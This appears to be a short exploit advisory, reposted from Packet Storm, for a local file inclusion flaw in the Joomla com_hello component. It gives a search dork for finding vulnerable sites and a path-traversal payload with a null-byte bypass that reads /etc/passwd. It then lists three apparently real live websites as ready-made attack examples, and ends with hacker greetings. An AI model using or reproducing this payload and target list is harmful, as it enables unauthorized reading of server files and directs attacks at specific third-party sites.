The Joomla Hello component suffers from a local file inclusion vulnerability.
f473f0c61e9e8c0ec07cfd80bd2864d9cc825caedb6e1771e7d868909f818c36##################################################################################
# Title : Joomla Component com_hello Local File Include
#
# Author : Ajax Security Team
#
# Discovered By : devilzc0der & Dominator
#
# Dork : inurl:"com_hello"
#
# h0m3 : www.ajaxtm.com
#
# Software Link : www.joomla.com
#
# Level : High
##################################################################################
# p0c :
# com_hello&controller=../../../../../../../../etc/passwd%00
#
# Please Use Null Byte ( %00 ) for Bypas .
##################################################################################
# 3xample :
#
#
http://golden-bird.ru/index.php?option=com_hello&controller=../../../../../../../../etc/passwd%00
#
#
http://etm-proekt.ru/index.php?option=com_hello&controller=../../../../../../../../etc/passwd%00
#
#
http://a2-svz.ru/index.php?option=com_hello&controller=../../../../../../../../etc/passwd%00
###################################################################################
# Special TNX t0 : Cair3x - HUrr!c4nE - E2MA3N - S3Ri0uS - iM4n - Sc0rpion
- Daniyal
###################################################################################
# GreetZ : black.shadowes - hadihadi - irsdl - Mormoroth - B@RBOD & All
Iranian HackerZ
###################################################################################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed